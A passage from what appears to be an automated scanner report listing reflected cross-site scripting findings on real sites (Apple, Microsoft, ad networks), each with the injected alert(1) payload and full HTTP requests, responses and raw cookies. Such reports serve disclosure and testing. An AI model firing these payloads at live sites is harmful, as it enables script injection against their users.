cO/mDMqJVBc5ZsUJoDjL5sJsdwzz/zoSjotJaA4FLdfqo/dl18VA==; rsiPus_txcj="MLsXtTENJApvJ5G2CtKgxPEJrF4+5C1lsBnrgEjvGi+eSZMchfnrP39kON1J8Dw2ez7PupwpYPP5yKMjmbdmh81UPDhyhpxyS7MO2AwR+rZMYnGA4GC9O9QvN1US1tLIl+LPn43PjJ7qQS/pGvY4QhuHwB8K95+qPEnYJnhaG4+IlaKd2qXTFD5NPxzH14rtpxNxhK/Qq6XR1GVuuD0MACeK9YttnZMRVKNyz145LDIp6sgKiL4Tv8VDrtPM20t4ks65WY2j91xoadjPpjUc7aRhCibeE9+Q0gW1g+GMarobzm3uSc9hihqHb2OuTNZp6HvcfpcSolGNaBNFn6mz9S4GdSRXyLKhtThdQvqgzDnGfGijXgpw4hpzJ+XSnKhaapQctKTTGePlLpcjX6DJ0AbryUPeOOvMt1vqCrWGGbdBnJPWRbmfpSBp+b4N/yIvO8wsWNsUJfELOwJAhvSkB6UA0wJyhIbDEgmaojrzG2g4qtKugltluN2yUYG6vo5rVBvqVcdeOkOkKCZ55Jpdoa/Ha3n0gD14Lny/vNlttrvJLIOJyQuk+fVFtklYOCKaHODtYdsy6UCkT1YKa2maAXdUxNfwJEP6X+bmUSljkLBrbBqPr2B/mk8xFnC4OuI21eh19jz9NrrOuYdaelXVAFfsVYl1N5RHr4poGi0gbBQ3IXaDUUmdxbkCMQjwFsM9XRo+GqH6DuFZyinGxc1pmKcjHZyEZAzw7emay24dMXff2kFeAIfeWnJVoykCyOShHGv6o9h7zZATWIiMyYHQGAnfWEjK9lqylOGKcFHzI1vIEluQgEUI6oDFaLn09Yd8x5HU4LR9I5pAso5hjheZzNKx9GihZwttVIKhHi+7RUxzyQi5WprC/6ARua3XbXuEnwW38MgmC1FcFf2OLrmBTx0NgCfVJ37CxnAT0fGeKaqG9PD6njWPiMNQLpbp1MeSeEIc2ooFnljQQIjq4cujHdr+masfVHuefX0AyFNi/9G8eqNYD/MbSh+5TYW7YTujwPvcm9aBPkFiSjNIveSmBaLoO7RN5jAO/tNDQDdP9QxJWrR4GR76w4sTNRGscEB4YhZiyUTfMuLGuFDDO3LxISk1Vc15oBSA20Uu/imPI820TKoKDPFXxBZPuS2W7/TagpYZOhHUlE1Jhh4hDGMH3+k3OUVHfxA8EFcwLOXecXXGXdkj7OM2CoEWN+1UGLnlNH7DOc6Q8N46vAfkGRXYuoYP29k5ad+fsqXZhbC8LPInaUOdVqv3WPMYA0GEjG8Dc/ycsOJ9YDVJiMpf5jiFRC5gqfpBHEExyKw/xQQF37oOrYfVFI8EMhDDyTZxMnM+QdZo2EL4ThE3vVQz6r6KEbMOAGcFNkhxJO1XNzL4WKOWGHo/kAIaQwPLJlofJFvV34UOEyDjoQodhdauy073JrFFp5liMGyUFlDu9DpafuqmexP1pihpMrhBicoTgU/7oSB3SEeXMCqbty3JnBi96+CSk8KsIK5Axz+lIxx5JsH17oVJwi6n1lmSvUdbQ6V5i4NYrwOD76lwBXRBoTMg4X14dFF1dnGGRQd/hgg2B99u3e1qIw=="; rsi_us_1000000="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"; rsi_segs_1000000=pUPF4kmhOQIQDzaRO+F29+DOqKU4kKdJ4yGdFhPolQMcsrefHXHN9uNg2v9sDss6IiP5italYhLuIFOkIfRVw0aOncY8feS+CC1xwsSgYnGMU8L3kcFgA6G017VVo+JvnSUxYMhqZdJhxzk7HAHyBi34+TxlpcAe0rE3MxkAI1GcJF/s6mk1RD72qZSKegvFKM6D1nFbXgAxHixzV4pVy15eibKHGM1xk8+/6LztD32W9BINSTKBLPLfdm/b1IPw7fz6tZVs9cYOasclh2Mo4iuKTX8RZlc4+2FHjj0CYtJrwjr4rhiSIazbgoHGFM/MPs+ny13jNbrI+T5o38VuIheq7h/leislJPuMZzq4x4gT0Tm7RBpnHgD3e3jfhrjqgOlhF2P3xlruoLW6NOdvlw5hozJ9RGZFBksQDgqv/Uok9KnGCKQSya+Q3wbJAWkhqiEHVdQyV3j4EymdVnkWb8Oa6dAzGIhHKWZMv/UChYFM4ipNmS+T+cGrdUbKUBn/l1CZS8i2UHzhw0v81xf0b5QS8sJBcYQ+h0Sdk2vivPj9Rj9O/2M6ho+xwHG+3V5SHuhxTEVQ1IQZnbupNNtdSu5Io2d0o6y1OpflfCY8UtG0McSLWcyuicYcSnFkR1KRMi47nC1FIcAk9jYJSR32MtJaBHEkX2fsYLkMwu8BxAvv6/J1eSbB549C2/UYasDTG+Oaj5oQys86syOzSQ/sjUDIbK/9w9zBqbStUPgCsOcYX1q8b1pUqrqwo2O0J2jdoGvMs9+We52GhNHDPM87BLT9P1sVFiDvBQ==; udm_0=MLv3NyEJZgpn34zE8FbQX8DEVknsM8NIw7Gjhe8Pm2S6tVxuOjTe4yOClBCUhAXKjb6J19qrC1jYeXBvc6uhEMx0wqBR+xj/+vRJI8RQ+vEeJTaNOjMo/nvLxqH4vJlo2cUOiJislM4Xjp+eXfCMJfpgMCAV6+SFFwEIfItU0lXJCgE7vjmgDggc/nxfSh+sro6PEZUWjguxHXbwQj+BKpUym8BujKsEHgUu8xy6OavwcDRlePjfoNG4xQjbgaXUpT6R1He+WuRN9XxzK1UiBaQJkuCqF6JARZ3+HHLlB3GpZF15KEoD0qNOthtBPTpDfRFO4hm10D+0PP0O87XactUPR5TLJ2a04vyvGKf8GngPESlGsOhKE+yi3jfljY2gj03WeTPUket5ITI0SZE0OyiuSbh+C5R2VZcUXFwznc7HUq/5LP84iAxc++RSRuqA0daJyhzu9r8QhKNNIh5yoLEtMrqiVqjZcmtPKcmM1Ac9WvDcsq9s1uo4McbGPHpaGYqxhJS/nEvv6CbG8PiRuesiLm5fnnoUmRmVt6VAka4WurEdc5Ss/LM6MV87SvuLPz43p6JlroKnWhYZ86ntXl1L63XY5U3VwnfdRIQHSe8OIJt6WCezFjcyYR+R8KbCWBiPHVTdL/EFM6NgJaBTVssphljayeEJLOv0fGu6QDrbP9lCLrDLSwcew4ip4U10GBdZQeB57rnuTu7dGlBAmdhOe038ashu/yuGZr6Ow+mcZ41emakxD0vtUjOk7PmOe6Gs35oAZX3aiL4Etv4QLyzjwehmxxrjOI5Ch4e2hSvD5axIG1HnJ0YztcwWN3ejt74I+J0i45Sq2eAsi0Ki0UvjPLrK/WhteJbPVsuQ8lwpD1heGlOmcSIrxr3EiAkxNcD1Dn+26UtBV3wvds0n1NpqTx3yp38oxa9r6ZPxtHUftECetdMl2Onw/za7b87X3QtwkZgb3gjKLfs/qnwtfk8A/gXEeBc/mBNec+uLvAZoZgTyBl96MPLajb+r3wwTxNNDUytsc07MKSqZi1Xu3ddkR0MHI75U/xuoESLY1Yqs200dwdI2dTSwQ/NaWHk2orfUv4bKpflgqdHHmW/n8jiDiSWp2RBeTcMPGoaJfgxctexQ+yATFhZe+qq39gyDLLuBY4t7EZN6bTyFhec70ARJuvevwxmx9AKzkYX0gWey30Ju7BSRWN1elqoHV3yPsPOpentHNa3HKwIrCep8PPT4AkE0rge/90UyjPj/5cMehmrZlwiSFQmue3IaVsN6lnHHUWd4xAIicK36BNgkmv29PDge7CsiBe/luRITMrAoYufrRYRF9GN9JelfXeYEcbiGUraqtwXi7/uU6buWBNDsPqz7uBf21CiUUkKJ8m4WsWx7PXoNaNsSjp59FAINfL+uAnX/ZkXQuPvcpb7p7feRFaWsgQBo6Fs8kPgyVCN4pOnG8SUgKK1DxqGpJAoqCsI0L9/AUwygX9sVOxT49FSRagWXwFGUjR3sZPbbFUanWEDMBSamQqcNAtyaA6XwMPjTerIOJF7SaSuoQyyP0dePFfrflKTeyFxq+Be4QcT4AXMxIz3W6GFTMuurl/NHNR8Tf7WumLEw0/9dwhTU8xyGYVoEroZusoLlKkWURmkU/MU5GFRjJc2QfDEMcaajrC3ah0I2N4mPQIqLwqGqWPobCWVuJ9kmnEfcOeWmsitv3qQ50qytONbhS0psleUPk/XvEGVgalODw3yQAIYWP3tokC9+eKa95Y/mNeVw9jve5HIsb05WkVjdwrbumf+/bEeSDyC58dQ3RJpwVtO7Gg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 23 Jul 2011 04:31:46 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 24 Jul 2011 04:31:46 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 04:31:45 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G076081CC9E<SCRIPT>ALERT(1)</SCRIPT>3AEA9239800" was not recognized.
*/

3.74. http://km.support.apple.com/kb/index [doctype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://km.support.apple.com
Path:	/kb/index

Issue detail

The value of the doctype request parameter is copied into the HTML document as plain text between tags. The payload dc073<img%20src%3da%20onerror%3dalert(1)>4cc5b1f4127 was submitted in the doctype parameter. This input was echoed as dc073<img src=a onerror=alert(1)>4cc5b1f4127 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /kb/index?page=products&locale=en_US&doctype=dc073<img%20src%3da%20onerror%3dalert(1)>4cc5b1f4127&callback=ACSearch.receiveGenericProducts HTTP/1.1
Host: km.support.apple.com
Proxy-Connection: keep-alive
Referer: http://support.apple.com/kb/index?page=search&src=support_site.home.search&locale=en_US&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D; ccl=YPG5TuFKot1LUn+lq23wrLdlvLPUZJXpPAP21q2AZI6ybOrmCQ9ZvagVaKElnHhuLxZWILPlyU10pXqhEcXHaZA8muizMYxVUyHDxAP/1nqg7Or3wEZaQGRv2xbBSUJmA90kWKiGNAW6Uf7jiyrAIqTtFgtOeWA2YYfTbJKKJt52YHNnKf5HURbWq1GKAWWdJwNuJX/jqQEzK8RJ4TumuXXzJMQryFbRo53bGT4o5YXTEstHYlEdhotv+GFiYid8W80i+u1p++O5ZSdYF3iEuzrN9myAmXbFZrGgn5TxcGU8v9leUS7EKDYqNxvqeypQHhHbO2dc9DqxVa1LGZTPv6wiFB5gKx83rZDijFgpC4S249Tgf+zDP3cBbWAEmvi2KDdVVFonUlUfpWpd1AK3CVm/Oi98XAN+OlMwHC/CdDLWB7VyDpfX5gJd+ZmnJ1I0sLGBXu3Ns7cDz4Rj66ko8ELCLhslcfJMEh45qUnY1+KFoUzgtF1EO6KPe5w2KQbxekoRSFW6zhoc9CCfqgPX9EQI85tjSAyuM2cQWDApn7n21P5svZBUoF4SrBI9fy6L; geo=US

Response

HTTP/1.1 500 Internal Server Error
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7l PHP/5.2.4 DAV/1.0.3 mod_jk/1.2.28
Content-Length: 181
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=600
Expires: Thu, 21 Jul 2011 20:57:17 GMT
Date: Thu, 21 Jul 2011 20:47:17 GMT
Connection: close

ACSearch.receiveGenericProducts(

   { "name":"PRODUCTBROWSER.BROWSE_dc073<img src=a onerror=alert(1)>4cc5b1f4127", "id": "MAIN_PRODUCTS"


       ,
       "products" : [
]

   }
   );

3.75. http://lifescript.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lifescript.us.intellitxt.com
Path:	/intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8cf9'-alert(1)-'244ace9388f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /intellitxt/front.asp?ipid=18057&e8cf9'-alert(1)-'244ace9388f=1 HTTP/1.1
Host: lifescript.us.intellitxt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR="AKdo0GgCJUYDq4t2/GN0I5MAADtIAAA7hAIAAAExTiYb6gA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Mon, 19-Sep-2011 19:22:25 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 11081
Date: Thu, 21 Jul 2011 19:22:25 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggin
...[SNIP]...
s.gaPageViewTracker='UA-15687529-23';$iTXT.js.verticalId='13';$iTXT.js.serverUrl='http://lifescript.us.intellitxt.com';$iTXT.js.serverName='lifescript.us.intellitxt.com';$iTXT.js.pageQuery='ipid=18057&e8cf9'-alert(1)-'244ace9388f=1';$iTXT.js.ipid='18057';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();(function(){var e=document.createElement("img");e.src="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=50000&c
...[SNIP]...

3.76. http://mm.chitika.net/minimall [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mm.chitika.net
Path:	/minimall

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 32e36%3balert(1)//f54c5063e27 was submitted in the callback parameter. This input was echoed as 32e36;alert(1)//f54c5063e27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /minimall?w=320&h=50&client=lifescript&sid=lifescript_mobile&cid=lifescript_mobile&type=mobile&screenres=1920x1200&winsize=1047x890&canvas=1023x140&frm=true&history=1&impsrc=amm&url=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cb=860&loc=12%2C140&output=simplejs&callback=ch_ad_render_search32e36%3balert(1)//f54c5063e27 HTTP/1.1
Host: mm.chitika.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:24:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 146
Connection: close
Content-Type: application/x-javascript; charset=utf-8

var ch_mmhtml = {"pixelhtml":"","reason":"not_mobile_device","alturl":"","output":"","cb":"860"};ch_ad_render_search32e36;alert(1)//f54c5063e27();

3.77. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f31a1'%3balert(1)//0c7fdb37037 was submitted in the admeld_callback parameter. This input was echoed as f31a1';alert(1)//0c7fdb37037 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf31a1'%3balert(1)//0c7fdb37037 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMzN119; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"318445\": [1310644253+ \"Th7YGwAJYV4K7GUs0lMuuA==\"+ 129398+ 75015+ 1685]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"609953\": [1310644252+ \"Th7YGgAJ5ZgK7GTR1UIraQ==\"+ 129395+ 75015+ 1685]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"609791\": [1311125511+ \"5865143651491006967\"+ 160196+ 103546+ 12332]+ \"678237\": [1311125559+ \"567377526065337370\"+ 4483+ 2534+ 12332]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"726658\": [1311125612+ \"B7F23440-C8B5-4684-BE17-08EC59EEAB9A\"+ 78882+ 35675+ 575]+ \"690770\": [1309951300+ \"ThRFQQAEG8YK5TlPHdsIpA==\"+ 63083+ 25140+ 6119]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuE4dJBNgFHizYMZH1kUGDVmfALSBowWYD6XDMfbiWwCnBLbobLLn88Fy26Hyq7/zyTAJNEOld38CKIXzOcS4bh9lQVo8pwNvz+wKDBoMBgwWDAARe8vZgPqOdJ1EUV04jJWoNrmTUtRRGfNALmtaS2q6NzHILXX7yxBEV0xHyT6rakVRXQN2IXP0ER7F4DMbTn79D2y6OuJINGDD6+jiE5+DzL3QsNmFNHfC0Gic9FE774E+XjGhwYU0Z1Al2VJfHqPLCrKMfMHi0Ars8Si06jCu76yCExklDi3/P87ZOFZQDOuMUpcefnvHbLRZ1+wCjBL7Ht6D0X04yuw43ZdQBGdtREkeuv7QYQoAEpukas="; io_freq_p1="eJzjEua4mCTAKPHmwYyPLAaMFmCaS5xjSbwAl8R2EEeBQYMBKLEdKvHDRoBVoh1JAszmEuY4mCDAJHGk6+IHiASDBQNQsC8MaHbzpqUogi/jgYJNa1EF70QABa/fWYIkKMKxLVTgIJPEt6ZWFKXLEoBKW84+fY8s+DgGKHihYTOK4IVQoOBcNMGnAUDBGR8a3iPb9CNQoJVZYtFpVNFbgQITGSXOLf//DtmAzTECzBL7nt5DETwKsn/urgsogt3hQMFb3w8iBAHPUWOk"; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1311125618+ \"4\": 1305981633}"; segments_p1="eJwdUctKAmEYxWYW06zmUXqAHqF9QTt3LfIZ0jYpSaC1yG6YRRDldaCLJFTipcESKkqLIkijSGoMUhjTvnM2h8OZ7zvfmfPrqmZnFV3VljLAp55LsNIdEmzWgW9H0LthVbD1CiXUGNKHtajb2DlI2qquaPseUS3Z0bXBgmpcny62MV2UaUXrjwsNFrFo0nCzByzw0GoLmD6BstaDbcxtHNNWRjqQt724/+mA17hk1qD45xRxL2sCRajtS6j33Nm9Ar/gH5WDUErM4p0QSHokZz6lGPFopIM7oSYmKpyLhOFV5n9a7+D2NzDnANdtcrZzyBQ+3jAHUB55e5lff9PQPxxcHYwJnWdpz5PGmq/A0qKjop7TMMleqly3GKNWxfpNAl8thoneAd9ZwwMntxgpH8Bk5w88xmZn+y6xf5tGxjjklwfI6+zkNg2lxNSzA6RLaUiXgTxD+YtFmnRP2byaAzYyfA7qoSzwh6WujOCB2WGQBq0N8D0HMWKG0DrzBjIQAlNCE1WsR87wgn3cf/Ir/6ZVti0="; partnerUID=eyIxMTUiOiBbIjRkY2U4YTUzMDUwOGIwMmQiLCB0cnVlXSwgIjE5MSI6IFsiODQ5NjUzMDYzOTI1MzI1NTgwNiIsIHRydWVdLCAiMTUiOiBbIjAwNDAwMzAwMTQwMDAwMDQ0OTg3MiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXSwgIjExMyI6IFsiRlFXV0MyVksyRFdGIiwgdHJ1ZV19

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 23 Jul 2011 13:48:46 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 23-Jul-2011 13:48:26 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 1070

document.write('<img width="0" height="0" src="http://tag.admeld.com/matchf31a1';alert(1)//0c7fdb37037?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1311860926&custom_user_segments=%2C11265%2C50185%2C32345%2C48153%2C6171%2C48669%2C7713%2C48674%2C48675%2C26671
...[SNIP]...

3.78. http://services.social.microsoft.com/Search/Data/Terms [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://services.social.microsoft.com
Path:	/Search/Data/Terms

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload bc091<script>alert(1)</script>21d034f6a3a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Data/Terms?callback=jsonp1311396321262bc091<script>alert(1)</script>21d034f6a3a&t=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&a=1&s=9&m=10&mtl=4 HTTP/1.1
Host: services.social.microsoft.com
